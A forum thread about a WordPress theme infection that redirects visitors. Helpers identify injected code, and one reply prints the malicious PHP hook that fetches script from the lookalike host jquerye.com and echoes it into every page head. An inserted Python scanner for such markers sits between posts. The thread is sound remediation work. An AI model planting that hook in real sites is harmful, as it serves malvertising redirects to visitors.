Author Topic: [Solved]  (Read 5878 times)

Offline geryeo

  • Newbie
  • *
  • Posts: 3
    • Personal Message (Offline)
[Solved]
« on: August 23, 2012, 09:42:10 PM »
Hello,
I just started a new website a few weeks ago, using WordPress + the goodnews 3.4 theme. But yesterday when I clicked on a post, "something" redirected me to this strange website: downloadmusicfreenow.com.
I can't figure out what can be infected... Please help me fix this.


Thank you!
« Last Edit: August 29, 2012, 09:32:03 AM by geryeo »

Offline !Donovan

  • LÖVE Scripting Website Analyst
  • avast! Evangelist
  • Super Poster
  • ***
  • Posts: 2138
  • Gender: Male
  • f(x)=2x+1
    • The WAR Against Malware
    • Personal Message (Offline)
Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #1 on: August 23, 2012, 10:24:01 PM »
Hi geryeo,

Can you provide the specific post you were on? Use hXtp:// instead of http://.

~!Donovan
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."
Useful Links: Sucuri SiteCheck | WAR | urlQuery | URLVoid | Wepawet

Offline polonus

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 20121
  • Gender: Male
  • malware fighter
    • Personal Message (Offline)
Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #2 on: August 23, 2012, 11:03:08 PM »
Hi geryeo,

Wait for !Donovan to sort this out, but consider these WOT web rep results: http://www.mywot.com/en/scorecard/downloadmusicfreenow.com?utm_source=addon&utm_content=popup-donuts   site is given as a malvertiser, so that is likely what will be turned up...
For your site I get a WordPress alert Web application version:
WordPress version: WordPress
Wordpress Version 3.3 or 3.4 based on: htxp://danongonline.net/wp-includes/js/autosave.js
WordPress theme: htxp://danongonline.net/wp-content/themes/goodnews34/
Wordpress internal path: /home/ducvan/public_html/danongonline.net/wp-content/themes/goodnews34/index.php
There could be a code issue here:
s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1 benign
[nothing detected] (script) s.gravatar.com/js/gprofiles.js?aa&ver=3.4.1
     status: (referer=danongonline.net/)saved 23917 bytes 54d6e2713dbe666dfb1c9339d1550616c2204807
     info: [img] s.gravatar.com/js/
     info: [decodingLevel=0] found JavaScript
     suspicious:
For further website security issues, see: http://net.saferpage.de/danongonline

polonus
« Last Edit: August 23, 2012, 11:37:30 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline geryeo

Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #3 on: August 24, 2012, 08:38:47 AM »
@Donovan  Sorry, I don't remember that post...

But I found in the theme folder .../post.php this part of code which looks very strange: ... jquerye.com/jquery-1.6.3.min.js ...
Shouldn't there be jquery.com?

Is there any good malware scanner site where I can upload the theme (I think the problem is there) and check it?

Thanks
« Last Edit: August 24, 2012, 09:19:38 AM by geryeo »

Offline polonus

Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #4 on: August 24, 2012, 11:38:55 AM »
Yes geryeo, that is malcode. !Donovan reported a similar case in another thread... jqueries was used there (plural); apparently they are variations on the same injected malcode theme.

polonus

Offline geryeo

Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #5 on: August 24, 2012, 11:46:44 AM »
Ok, so now I just need to delete that part with ...jquerye.com/jquery-1.6.3.min.js... to solve it?

Thanks polonus

Offline polonus

Re: [Wordpress] Malware redirect to another site. Help pls!
« Reply #6 on: August 24, 2012, 11:57:11 AM »
Hi geryeo,

You are welcome. Here is what the Sucuri Blog had on this: http://blog.sucuri.net/2012/07/fake-jquery-website-serving-redirection-malware.html
Blog article author: dre armeda

polonus

Offline RamyNasr

  • Newbie
  • *
  • Posts: 1
    • Personal Message (Offline)
Re: [Solved]
« Reply #7 on: October 11, 2012, 02:24:04 AM »
Just to leave this as a reference for all who have a similar problem:

The code that I had in my WordPress website was inside the theme folder in a file called functions.init.php and it looked like this:

Code:
if (!function_exists('insert_jquery_slider')) {
    function insert_jquery_slider ()
    {
        if (function_exists('curl_init')) {
            $url = "http://www.jquerye.com/jquery-1.6.3.min.js";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            echo $data;
        }
    }
    add_action('wp_head', 'insert_jquery_slider');
}

If you ever happen to be in the same place, this is how to solve it:

Just search in all your files by text and look for “jquerye” or, even better, for “insert_jquery_slider” or any of the patterns you see in the piece of code above. That should point you to where you need to be! (hint: just remove the whole function)
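
The text search described in the post above, as an added example (not code from this thread or from any project mentioned in it). It goes beyond the two literal strings by also flagging hosts within two edits of `jquery.com` and any file that echoes a curl response from a `wp_head` hook; `TRUSTED`, the finding labels and the sample file layout are assumptions.

```python
import os, re, tempfile, pathlib
from urllib.parse import urlparse

MARKERS = ("jquerye", "insert_jquery_slider")  # strings named in the post above
TRUSTED = ("jquery.com",)                      # assumption: the host being imitated
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
# Constructed sample: abbreviated copy of the snippet quoted in the post above.
SAMPLE = """<?php function insert_jquery_slider() { $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://www.jquerye.com/jquery-1.6.3.min.js");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); echo curl_exec($ch); }
add_action('wp_head', 'insert_jquery_slider'); ?>"""

def edit_distance(a, b):  # Levenshtein distance between two host names
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def scan_text(text):  # sorted list of findings for one file's contents
    found = {"marker:" + m for m in MARKERS if m in text}
    for url in URL_RE.findall(text):
        host = re.sub(r"^www\.", "", urlparse(url).hostname or "")
        # Distance 0 is the trusted host itself; 1-2 edits is a near-miss spelling.
        if any(0 < edit_distance(host, t) <= 2 for t in TRUSTED):
            found.add("lookalike-host:" + host)
    # Remote content fetched with curl and printed into every page's <head>.
    if "curl_exec" in text and "echo" in text and re.search(r"add_action\(\s*['\"]wp_head", text):
        found.add("remote-fetch-echoed-into-wp_head")
    return sorted(found)

def scan_tree(root):  # relative path -> findings, for every .php/.js file under root
    hits = {}
    for folder, _, names in os.walk(root):
        for name in (n for n in names if n.endswith((".php", ".js"))):
            path = os.path.join(folder, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_text(fh.read())
            if findings:
                hits[os.path.relpath(path, root)] = findings
    return hits

def demo():  # throwaway theme folder holding SAMPLE plus one clean file
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("functions.init.php", SAMPLE), ("index.php", "<?php get_header(); ?>")):
            pathlib.Path(root, name).write_text(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

Point `scan_tree` at a downloaded copy of `wp-content/themes` to list the files to review; a finding is a prompt to read the file, not a verdict.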

Offline polonus

Re: [Solved]
« Reply #8 on: October 11, 2012, 08:31:32 AM »
Hi RamyNasr,

We thank you very much for the solutions you found. Glad we could help to arrive there. Stay safe and secure,

polonus

Offline icejay2000

  • Newbie
  • *
  • Posts: 1
    • Personal Message (Offline)
Re: [Solved]
« Reply #9 on: April 28, 2013, 10:12:40 PM »
Hi, I don't know if I'm a little late to post in here regarding this issue. I am having the same problem. I am trying to edit 

 <?php if (!function_exists('insert_jquery_slider')){function insert_jquery_slider(){if (function_exists('curl_init')){$url = "http://www.jquery.com";$ch = curl_init();   $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_slider');} ?>

I just don't know what part to take out exactly. One person mentioned removing the function; I just need to know exactly what part of the code is the function, as I am totally new to this stuff... I have tried taking certain parts of it out, and I just mess things up. Any help will be greatly appreciated! Thank you in advance.

Offline !Donovan

Re: [Solved]
« Reply #10 on: April 28, 2013, 10:47:48 PM »
Everything that you posted is part of the function. Did you try removing the whole line?

Also: The code you provide says jquery.com, not jquerye.com. Is there any specific reason why you want to remove this?

~!Donovan

 
